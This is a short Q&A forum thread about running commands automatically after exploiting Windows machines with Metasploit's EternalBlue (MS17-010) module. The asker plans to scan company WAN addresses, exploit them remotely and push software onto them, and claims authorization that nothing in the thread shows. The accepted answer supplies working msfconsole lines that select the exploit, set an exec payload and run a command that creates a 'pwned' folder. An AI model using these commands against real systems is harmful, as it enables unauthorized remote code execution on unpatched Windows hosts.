# AutoScripting for Windows Cmd shell when session start

Tags: windows, metasploit

I use metasploit latest version. I know autoscripting with meterpreter payloads. But I need to know how to do it with a shell/bind_tcp payload.

I want to write a script for when exploit is completed and command shell is opened do this:

`cd c:&mkdir pwned`

Comment: why use bind_tcp? why not use another script as the payload that includes a bind shell as well as the commands you want to run?

Comment: I am IT for some companys, i must test vulnerable system via remote attack so i want to create anti wannacry script, but i cant access directly remote computers, my road map is this->
*find ms17_10 vulns on company ips(its not inside lan ip's,its wan ip's)
*use ms17_10 eternalblue exploit
*install my anti wannacry app
*close connection and do it this for next ip's

But most systems with ms17_10 exploits work with shell bind_tcp payload i cant success meterpreter or reverse shell tcp payloads.

(Usualy os win 7 pro and server 2008 r2)

It's importand job for me, and its not duplicated

Answer (score 0, accepted):

I have little solution :

```
use exploit/windows/smb/ms17_010_eternalblue
set TARGET 0
set payload windows/x64/exec //its good idea for my job
set cmd cmd.exe\ \/k\ cd\ c:\\users\\user1\\desktop&mkdir pwned
```

exploit!

Comment: so, basically, the answer in my comment

Comment: yeah, but only work this payload other meterpreter payloads not working.